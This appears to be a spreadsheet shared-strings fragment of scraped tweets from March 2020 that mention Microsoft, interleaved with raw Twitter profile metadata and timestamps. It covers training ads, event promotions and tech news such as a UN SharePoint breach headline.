  <si>
    <t>Our employers have been topping up their knowledge on databases this week. #databases #microsoft #access #programming #tech #digital #business #100daysofcode @HCICT_SteveH https://t.co/6AoFW2GIjv</t>
  </si>
  <si>
    <t>{'id': 1176449573537165312, 'id_str': '1176449573537165312', 'name': 'Cian L', 'screen_name': 'HCICT_CianL', 'location': 'Jersey', 'description': 'Luxilogic:\nIT Student at @Highlands_JSY', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 30, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Tue Sep 24 10:53:37 +0000 2019', 'favourites_count': 77,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'http://pbs.twimg.com/profile_images/1196879022082461696/beIQC9_j_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196879022082461696/beIQC9_j_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1176449573537165312/1574192733',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</si>
  <si>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09:00:11 +0000 2020</t>
  </si>
  <si>
    <t>UN admits data breach from unpatched sharepoint vulnerability 
https://t.co/t8DXabvDZd
#CyberCrime #UN #DataBreach #SharePoint #Vulnerability #Microsoft #CyberSecurity #InfoSec #Hackers #InformationTechnology #CyberAttack #SecurityRisk #PrivacyThreat #Networks #CyberCriminal https://t.co/3n8vMYY0Ct</t>
  </si>
  <si>
    <t>{'id': 2573068338, 'id_str': '2573068338', 'name': 'SaltDNA', 'screen_name': 'saltcontrol', 'location': 'Belfast, Northern Ireland', 'description': 'The #1 secure enterprise #communications company within the #Cybersecurity 500. A software solution that enables absolute privacy in #mobile communications.', 'url': 'https://t.co/VbTrURhxlB', 'entities': {'url': {'urls': [{'url': 'https://t.co/VbTrURhxlB', 'expanded_url': 'http://www.saltdna.com', 'display_url': 'saltdna.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1855, 'friends_count': 1942, 'listed_count': 383, 'created_at': 'Tue Jun 17 15:16:40 +0000 2014', 'favourites_count': 2572, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12131,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'http://pbs.twimg.com/profile_images/1169185757363351552/cZIoxrq7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169185757363351552/cZIoxrq7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2573068338/1498831053', 'profile_link_color': '131516',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</si>
  <si>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09:00:02 +0000 2020</t>
  </si>
  <si>
    <t>#Danone &amp;amp; #Microsoft have joined forces to launch the #AI Factory for #AgriFood - Cecile Cabanis https://t.co/8l1BmrD3wp #MSFTAdvocate</t>
  </si>
  <si>
    <t>Mon Mar 02 09:00:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Office - #Excel 2016 Advanced Level
4-5 Mar in Dubai
https://t.co/dygmqZ0MJm
Client Testimonial:
Very professional and knowledgeable Trainer. Very straightforward and comprehensive. I now feel more confident using Excel. (Commercial Associate)
#spearheadgulf https://t.co/P0cDQtrGf0</t>
  </si>
  <si>
    <t>{'id': 2436892866, 'id_str': '2436892866', 'name': 'Spearhead Training', 'screen_name': 'SpearheadGulf', 'location': 'Dubai, United Arab Emirates', 'description': 'Spearhead Training is one of the Middle Eastâ€™s leading soft skills training brands and has delivered training to over 4,000 companies in the Gulf region.', 'url': 'https://t.co/Ik3FyK1SOq', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ik3FyK1SOq', 'expanded_url': 'https://www.spearhead-training.com/', 'display_url': 'spearhead-training.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 653, 'friends_count': 54, 'listed_count': 2, 'created_at': 'Thu Apr 10 11:39:34 +0000 2014', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5601,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'http://pbs.twimg.com/profile_images/866190898970984448/daAzU00T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/866190898970984448/daAzU00T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2436892866/1582624045',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</si>
  <si>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08:58:55 +0000 2020</t>
  </si>
  <si>
    <t>[Archive] #Microsoft #Exchange 2013/ 2016/ 2019 shows blank ECP &amp;amp; OWA after changes to #SSL certificates https://t.co/jYblfQqQ0S #bug #troubleshooting</t>
  </si>
  <si>
    <t>Mon Mar 02 08:57:24 +0000 2020</t>
  </si>
  <si>
    <t>SMB over QUIC: Files Without the VPN https://t.co/19TpOSpKfm #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 08:57:23 +0000 2020</t>
  </si>
  <si>
    <t>Can't connect to Windows Share - Error code: 0x80070035. The network path was not found. https://t.co/VNvhyvSVTZ #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 08:55:19 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's attention to detail #Office365 https://t.co/Wyx4ronJWt</t>
  </si>
  <si>
    <t>{'id': 4764931, 'id_str': '4764931', 'name': 'Jens C.', 'screen_name': 'jensc', 'location': 'Darmstadt, Germany', 'description': 'Travels without moving. Works @ IWU Germany (opinions are my own) - Software-/Web-Developer Â· Android/iOS/Angular Â·ðŸŒ± Â· Likes Kotlin/Java/Swift/Rust/Typescript', 'url': 'https://t.co/B6sOw5QZ0B', 'entities': {'url': {'urls': [{'url': 'https://t.co/B6sOw5QZ0B', 'expanded_url': 'http://osaft.org', 'display_url': 'osaft.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 184, 'friends_count': 944, 'listed_count': 21, 'created_at': 'Sun Apr 15 14:52:16 +0000 2007', 'favourites_count': 866, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4268, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1081640260436676608/LsXmx8eS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081640260436676608/LsXmx8eS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4764931/1414628491',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</si>
  <si>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08:47:47 +0000 2020</t>
  </si>
  <si>
    <t>Eager to know about Cloud Technology! Book your Seat for our Online Session!
Register Here: https://t.co/XJpg8KN5eB
#SynergeticsConsulting #CloudThursday #WebinarSeries #Session4 #Cost #Optimisation #Cloud #CloudComputing #Microsoft #Azure #Technology https://t.co/3wWoroEnMU</t>
  </si>
  <si>
    <t>Mon Mar 02 08:47:07 +0000 2020</t>
  </si>
  <si>
    <t>Often associated with doomsday scenarios, #AI is helping working parents manage work/life balance. #Microsoft #WomenTechMakers  #Aiforgood
 #iwd2020 #WomenInSTEM #WomenInScience https://t.co/2LgbwFdHCv</t>
  </si>
  <si>
    <t>Mon Mar 02 08:45:06 +0000 2020</t>
  </si>
  <si>
    <t>Vatican joins IBM, Microsoft to call for facial recognition regulation https://t.co/cgto7SlGJy #ai #ArtificialInteligence #MachineLearning #FacialRecognition #Vatican #microsoft #ibm #regulation https://t.co/BDYk9uyMYL</t>
  </si>
  <si>
    <t>Mon Mar 02 08:35:00 +0000 2020</t>
  </si>
  <si>
    <t>Coronavirus: #Microsoft warns of hit to computer sales https://t.co/Nq1lShHYx1 #biz #coronavirus</t>
  </si>
  <si>
    <t>{'id': 3061847355, 'id_str': '3061847355', 'name': 'CSSCloud LTD', 'screen_name': 'CSSCloudLTD', 'location': 'Great Yarmouth, NR31 0NB', 'description': 'CSSCloud supplies, installs and maintains business computers, servers and IT systems for companies who just want an expert partner to take away all the hassle.', 'url': 'https://t.co/zTPA8L8gIb', 'entities': {'url': {'urls': [{'url': 'https://t.co/zTPA8L8gIb', 'expanded_url': 'https://www.csscloud.co.uk', 'display_url': 'csscloud.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 424, 'friends_count': 842, 'listed_count': 22, 'created_at': 'Wed Feb 25 12:54:51 +0000 2015', 'favourites_count': 515, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1964,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'http://pbs.twimg.com/profile_images/904983539279679488/kc_JZCKU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/904983539279679488/kc_JZCKU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3061847355/1561644242',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</si>
  <si>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08:34:56 +0000 2020</t>
  </si>
  <si>
    <t>We definitely need to shoot for the stars..Our life depends on solar  power wind and cheaper energy efficiency such as nuclear energy as well safely is a must also..#Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 08:33:59 +0000 2020</t>
  </si>
  <si>
    <t>Medical devices and IoT to be safer from attacks as cyberMDX has partnered with Microsoft Azure. To more read: https://t.co/MpeGsPKpzs
#lot #Medicaldevices #cyber #MicrosoftAzure #Microsoft #Azure #security #lotsecurity #logesys #cloud #analytics #dataanalytics #cybersecurity</t>
  </si>
  <si>
    <t>Mon Mar 02 08:32:26 +0000 2020</t>
  </si>
  <si>
    <t>ICYMI: Microsoft starts rolling out new icons to all Windows 10 users https://t.co/bXrDhQcOZG #Microsoft #Windows10</t>
  </si>
  <si>
    <t>{'id': 2542751, 'id_str': '2542751', 'name': 'Mark WyciÅ›lik-WilsonðŸ´\U000e0067\U000e0062\U000e0073\U000e0063\U000e0074\U000e007fðŸ‡µðŸ‡±ðŸ‡ªðŸ‡ºðŸ³ï¸\u200dðŸŒˆ', 'screen_name': 'MarkWilsonWords', 'location': 'Brenna, Polska', 'description': "A long-standing Poland-based technology journalist writing for @BetaNews and @TechRadar. ðŸ³ï¸\u200dðŸŒˆðŸ‡µðŸ‡±ðŸ‡ªðŸ‡º\n'I know I believe in nothing, but it is my nothing'", 'url': 'https://t.co/BKyyg8L9DH', 'entities': {'url': {'urls': [{'url': 'https://t.co/BKyyg8L9DH', 'expanded_url': 'https://betanews.com/author/mwilson/', 'display_url': 'betanews.com/author/mwilson/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1543, 'friends_count': 1266, 'listed_count': 161, 'created_at': 'Tue Mar 27 19:00:15 +0000 2007', 'favourites_count': 4021, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16541,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'http://pbs.twimg.com/profile_images/1136591828092968960/WrSMyYaX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136591828092968960/WrSMyYaX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2542751/1532055476',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</si>
  <si>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08:31:22 +0000 2020</t>
  </si>
  <si>
    <t>Free online event not to miss: "Join us April 2 to be the first to see the latest Power Apps innovations at the Microsoft Business Applications Virtual Launch Event." Be the first to experience new #Dynamics365 and #Microsoft Power Platform capabilities. https://t.co/i5kRTR4vfW</t>
  </si>
  <si>
    <t>Mon Mar 02 08:26:31 +0000 2020</t>
  </si>
  <si>
    <t>We will only ever teach you in small class sizes, provide you with state of the art equipment and software.
We run over 400 types of course, including #Excel #Word #AutoCAD #Microsoft #Office365.
Courses run in #Cardiff #Bridgend #Swansea and #Newport
#CPD #Education #Training https://t.co/oD3T1y1Ilq</t>
  </si>
  <si>
    <t>{'id': 833980233279733760, 'id_str': '833980233279733760', 'name': 'Computer Training Cymru', 'screen_name': 'ComputerCymru', 'location': 'Bridgend and Cardiff', 'description': 'Welcome to Computer Training Cymru. Delivering #IT and #Engineering in a range of #Office and #CAD courses. Also providing inhouse IT training all across Wales.', 'url': 'https://t.co/ruqYMfjHeR', 'entities': {'url': {'urls': [{'url': 'https://t.co/ruqYMfjHeR', 'expanded_url': 'http://www.computertrainingwales.co.uk', 'display_url': 'computertrainingwales.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8043, 'friends_count': 3827, 'listed_count': 33, 'created_at': 'Tue Feb 21 10:02:37 +0000 2017', 'favourites_count': 1116, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1443,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'http://pbs.twimg.com/profile_images/1199961948655407104/17daTbjM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1199961948655407104/17daTbjM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/833980233279733760/1574892205',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</si>
  <si>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08:25:11 +0000 2020</t>
  </si>
  <si>
    <t>Pope Francis joins IBM and Microsoft in call for AI regulation
#AI #IBM #ArtificialIntelligence #Microsoft #AIregulation https://t.co/tHnQPu6mA0</t>
  </si>
  <si>
    <t>{'id': 2768097309, 'id_str': '2768097309', 'name': 'Mike Potter', 'screen_name': 'MikePotterTD', 'location': 'North West, England', 'description': '#IBM @TechDataASUK \n#AI #BigData #Storage #POWER #Cloud #IoT #Watson #TechTrends #ML\nFamily 1st with x2 girls, Evertonian, Saints RL, My views are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1654, 'friends_count': 4086, 'listed_count': 8, 'created_at': 'Fri Sep 12 17:55:39 +0000 2014', 'favourites_count': 371, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 547,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'http://pbs.twimg.com/profile_images/1197629294433972224/ebjJmPe4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197629294433972224/ebjJmPe4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2768097309/1577962508',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</si>
  <si>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08:25:08 +0000 2020</t>
  </si>
  <si>
    <t>Looking for #Microsoft events is now easy with these sites.
Check them in our latest blog post!
https://t.co/0R3Al4mxpb</t>
  </si>
  <si>
    <t>{'id': 1612912808, 'id_str': '1612912808', 'name': 'NIFTIT', 'screen_name': 'NIFTIT', 'location': 'USA, Vietnam &amp; Hong Kong', 'description': 'We build beautiful, data-driven web, mobile applications, #Office365 and #SharePoint enterprise solutions to help #NonProfit and #SMB make smarter decisions.', 'url': 'http://t.co/CoG9VDVy92', 'entities': {'url': {'urls': [{'url': 'http://t.co/CoG9VDVy92', 'expanded_url': 'http://www.niftit.com', 'display_url': 'niftit.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3056, 'friends_count': 2312, 'listed_count': 194, 'created_at': 'Mon Jul 22 14:05:24 +0000 2013', 'favourites_count': 105916, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4648,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'http://pbs.twimg.com/profile_images/560591636783046656/ZKCb0z-3_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/560591636783046656/ZKCb0z-3_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1612912808/1470650636', 'profile_link_color': 'DF2826',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</si>
  <si>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08:25:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft cancels Melbourne #IoT event #mbadmb  https://t.co/CQjjjdfT4B</t>
  </si>
  <si>
    <t>{'id': 1179831345712893958, 'id_str': '1179831345712893958', 'name': 'Feng QIU-FIELBAL', 'screen_name': 'FengQiuFielbal', 'location': 'Paris', 'description': "Etudiante en @MBADMB,  je recherche d'un poste : consultant en  #communication #TrasnfoNum #UX. Je suis #multiculturel #trilingue #relationnel et #crÃ©ative", 'url': 'https://t.co/9tjfnn4oJw', 'entities': {'url': {'urls': [{'url': 'https://t.co/9tjfnn4oJw', 'expanded_url': 'https://www.linkedin.com/in/feng-qiu', 'display_url': 'linkedin.com/in/feng-qiu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 341, 'friends_count': 552, 'listed_count': 4, 'created_at': 'Thu Oct 03 18:51:39 +0000 2019', 'favourites_count': 1085, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1873, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1179831543260467201/RJKaa_lE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179831543260467201/RJKaa_lE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1179831345712893958/1582361533',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</si>
  <si>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Microsoft says Autonomous Vehicles could create 20-100TB of data per day, you're going to need Azure - techAU https://t.co/WPGowJTIWO #ai #ArtificialInteligence #MachineLearning #microsoft #azure #selfdrivingcars https://t.co/2UGmiOvyjU</t>
  </si>
  <si>
    <t>Mon Mar 02 08:24:34 +0000 2020</t>
  </si>
  <si>
    <t>#SMB over #QUIC: Files Without the #VPN https://t.co/7upRsck8ol #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Mon Mar 02 08:23:45 +0000 2020</t>
  </si>
  <si>
    <t>Can it be true? I hope so! -The Microsoft Surface Duo could arrive ahead of schedule, but with last-gen hardware https://t.co/yXv6xkEC9k via @gsmarena_com #Microsoft #Duo</t>
  </si>
  <si>
    <t>{'id': 432319601, 'id_str': '432319601', 'name': 'Ernst Steffen', 'screen_name': 'Ernst_Steffen', 'location': 'The Netherlands', 'description': '#Humanfirst | e-office | Understands Enterprise, Healthcare and Business change | Bruckner devotee | Golf | SÃ¼dtirol | Founder Ernstig', 'url': 'https://t.co/upaQM2m9ui', 'entities': {'url': {'urls': [{'url': 'https://t.co/upaQM2m9ui', 'expanded_url': 'http://e-office.com', 'display_url': 'e-office.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 217, 'friends_count': 250, 'listed_count': 89, 'created_at': 'Fri Dec 09 08:30:18 +0000 2011', 'favourites_count': 1849, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6822,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False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1169292365779132416/byFYlVL1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169292365779132416/byFYlVL1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/432319601/1556685821',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</si>
  <si>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08:22:02 +0000 2020</t>
  </si>
  <si>
    <t>Drive #innovation across your organization by building professional-grade #apps without writing #code at this free technical training for IT and Business decision-makers. 
#RegisterNow    https://t.co/YPGXoDrYwN
#technology #Microsoft #training #workshop #Dubai</t>
  </si>
  <si>
    <t>Mon Mar 02 08:20:01 +0000 2020</t>
  </si>
  <si>
    <t>"Leaf Launches in Microsoft's Dublin HQ" by @JillianGodsil https://t.co/eAnTSGuhBr #microsoft #leaf</t>
  </si>
  <si>
    <t>{'id': 716348353915686912, 'id_str': '716348353915686912', 'name': 'Hacker Noon', 'screen_name': 'hackernoon', 'location': 'World Wide Web, &amp; Colorado ', 'description': 'how hackers start their afternoons. where 10k+ technologists publish stories &amp; expertise for 4M+ monthly readers. https://t.co/My4i81YDec', 'url': 'https://t.co/vraIEndiOl', 'entities': {'url': {'urls': [{'url': 'https://t.co/vraIEndiOl', 'expanded_url': 'http://hackernoon.com', 'display_url': 'hackernoon.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/My4i81YDec', 'expanded_url': 'http://publish.hackernoon.com', 'display_url': 'publish.hackernoon.com', 'indices': [114, 137]}]}}, 'protected': False, 'followers_count': 54408, 'friends_count': 12227, 'listed_count': 1476, 'created_at': 'Sat Apr 02 19:35:31 +0000 2016', 'favourites_count': 5672, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 47903, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227978065206075397/8IjKxrJ7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227978065206075397/8IjKxrJ7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/716348353915686912/1579777005',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</si>
  <si>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08:19:03 +0000 2020</t>
  </si>
  <si>
    <t>How well do you know Microsoft Identity Manager? 
As our previous #MIM course customers will agree, it pays to train with the experts.
Follow the link to book a course with our highly regarded training mastermind, @Identity_Gavin.
https://t.co/cjr1ua1ieL
#MIM2016 #Microsoft https://t.co/571HjS2VPT</t>
  </si>
  <si>
    <t>Mon Mar 02 08:15:07 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 08:13:03 +0000 2020</t>
  </si>
  <si>
    <t>It's a new week here, be intentional about the decision to be superfluous instead of running out of stock
#vetvotng #microsoft #RMABAR #MondayMotivation #Punchline
#nuwkgracee #BernieInLA
#newweekgracee https://t.co/QkvBYXweIM</t>
  </si>
  <si>
    <t>Mon Mar 02 08:11:51 +0000 2020</t>
  </si>
  <si>
    <t>As you know the @scottishsummit was awesome. This morning I've written a blog about the sessions I attended and some great takeaways! Have a read &amp;amp; feel free to get in touch!
#SS2020 #ScottishSummit #PowerAddicts #TDG #MSDyn365 #Microsoft #PowerPlatform
https://t.co/xKhuUQzKbk</t>
  </si>
  <si>
    <t>Mon Mar 02 08:10:10 +0000 2020</t>
  </si>
  <si>
    <t>Did you ever think you'd see Nick Wallace, Commercial Director at @Azure on stage at #Oracle #OpenWorld? 
Nick was discussing compatibility between various softwares. #OOWLON  #Microsoft #tech #technology #talenterprize https://t.co/xwtHkP78pY</t>
  </si>
  <si>
    <t>{'id': 2484061273, 'id_str': '2484061273', 'name': 'Talenterprize', 'screen_name': 'Talenterprize', 'location': 'UK, USA, Ireland.', 'description': '#Oracle Permanent #Recruitment Specialists. International #OracleRecruitment.', 'url': 'http://t.co/EaMV3EFxRO', 'entities': {'url': {'urls': [{'url': 'http://t.co/EaMV3EFxRO', 'expanded_url': 'http://www.talenterprize.com', 'display_url': 'talenterprize.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 539, 'friends_count': 2326, 'listed_count': 8, 'created_at': 'Thu May 08 16:28:12 +0000 2014', 'favourites_count': 74, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1147,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'http://pbs.twimg.com/profile_images/1212394250673049603/RleJgTM9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212394250673049603/RleJgTM9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2484061273/1577892290',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</si>
  <si>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08:06:01 +0000 2020</t>
  </si>
  <si>
    <t>Join our @NICECompliance and @Microsoft compliance 'rock stars' for a forum dedicated to #Cloud and #Teams. Its your last chance to register  click here to learn more &amp;gt;&amp;gt;  https://t.co/FXDVbuN55A
#NICECompliance #NetworkwithNICE #Microsoft #Compliance
https://t.co/zeTjUF4tCG</t>
  </si>
  <si>
    <t>{'id': 802514204, 'id_str': '802514204', 'name': 'Kate Underwood', 'screen_name': 'Kate_Denness', 'location': 'England, United Kingdom', 'description': 'Event Marketer. Cats, memes and vacations. Mainly cats. Dogs are cool too. Cautious optimist. Fun and Sun seeker. Connect on LinkedIn', 'url': 'https://t.co/WoDeaPJQsZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/WoDeaPJQsZ', 'expanded_url': 'https://www.linkedin.com/profile/view?id=224645157', 'display_url': 'linkedin.com/profile/view?iâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 516, 'friends_count': 515, 'listed_count': 18, 'created_at': 'Tue Sep 04 14:20:05 +0000 2012', 'favourites_count': 4320, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2376,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'http://pbs.twimg.com/profile_images/1181336376387739653/sM2CyLwn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1181336376387739653/sM2CyLwn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/802514204/1574949299',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</si>
  <si>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08:05:44 +0000 2020</t>
  </si>
  <si>
    <t>Want to boost or expand your #CloudCareer by learning #MicrosoftAzure?
Upgrade your knowledge by registering on #K21Academys FREE Live Masterclass: https://t.co/Xgx86GZWlh.
Become a #Microsoft [AZ-103] Certified #AzureAdministrator &amp;amp; Earn A Lot More in 2020.
#Azure #AZ103</t>
  </si>
  <si>
    <t>{'id': 713699573991153665, 'id_str': '713699573991153665', 'name': 'K21 Academy', 'screen_name': 'k21academy', 'location': 'London, England', 'description': 'K21 Academy, Oracle Gold Partner specialized in Oracle Implementation &amp; Training.', 'url': 'https://t.co/TeakWqnHCx', 'entities': {'url': {'urls': [{'url': 'https://t.co/TeakWqnHCx', 'expanded_url': 'http://k21academy.com', 'display_url': 'k21academy.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 287, 'friends_count': 168, 'listed_count': 7, 'created_at': 'Sat Mar 26 12:10:13 +0000 2016', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2294, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/724221121059385344/5DJ1Zd8k_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/724221121059385344/5DJ1Zd8k_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/713699573991153665/1583299383',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</si>
  <si>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08:05:13 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">@8bitclassroom @donasarkar I don't just make my own graphics. I do it with #PowerPoint. Because #Microsoft #Office365 adds EXTRA to Ordinary and helps us be extraordinary </t>
  </si>
  <si>
    <t>Mon Mar 02 08:03:56 +0000 2020</t>
  </si>
  <si>
    <t>How secure is the Cloud? We work with #Microsoft whose leading solution for business cloud storage is #Azure. It is designed with security in mind and holds hundreds of certifications. Find out more about Cloud security: https://t.co/2SNUJYUJbh #OnlineSecurity https://t.co/opD0HIuNWx</t>
  </si>
  <si>
    <t>Mon Mar 02 08:03:43 +0000 2020</t>
  </si>
  <si>
    <t>New video up!  https://t.co/Fnn2SUhTli dont forget to like and sub! #XboxSeriesX #gamingchannel #mixedupvidz #microsoft #PlayStation5 #gaming https://t.co/i880XWfSGw</t>
  </si>
  <si>
    <t>{'id': 728472643595206656, 'id_str': '728472643595206656', 'name': 'Rahat Mall', 'screen_name': 'RahatMall', 'location': '', 'description': 'Love Reading, Gaming, Manga, Anime, Music, Movies, Conspiracy theories &amp; Cats! PSN, XBOX, Instagram, Youtube Gaming Channel ID: psychoanalyzer8 ðŸ’ðŸ»\u200dâ™€ï¸', 'url': 'https://t.co/oVHvnQXtgK', 'entities': {'url': {'urls': [{'url': 'https://t.co/oVHvnQXtgK', 'expanded_url': 'https://www.youtube.com/channel/UCrsIKe2CHjHJVmu02SKhT4Q', 'display_url': 'youtube.com/channel/UCrsIKâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 100, 'friends_count': 91, 'listed_count': 8, 'created_at': 'Fri May 06 06:33:07 +0000 2016', 'favourites_count': 2966, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1001,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'http://pbs.twimg.com/profile_images/990603477926768645/r3khxgjM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/990603477926768645/r3khxgjM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/728472643595206656/1463219999',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</si>
  <si>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08:03:08 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Xbox One X 1TB Console - Bundle with Games   Accessories  ( 58 Bids )   #Microsoft  #Xbox  https://t.co/bs9kR7MoK2</t>
  </si>
  <si>
    <t>{'id': 1013484764039450625, 'id_str': '1013484764039450625', 'name': 'Qeujmu Coozda', 'screen_name': 'coozda', 'location': 'New York, USA', 'description': 'music sports news travel', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 543, 'friends_count': 54, 'listed_count': 2, 'created_at': 'Sun Jul 01 18:09:32 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11473, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1013485802062573570/j21iC_BT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1013485802062573570/j21iC_BT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1013484764039450625/1530468847',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</si>
  <si>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08:01:48 +0000 2020</t>
  </si>
  <si>
    <t>Thanks to everyone who participated! I am happy to work with all of you and look forward to future #Xhackers meetup events. We have big plans - stay tuned!
https://t.co/odEHX90xII
#bangalore #events #meetups #android #ios #dotnet #talks #networking #microsoft</t>
  </si>
  <si>
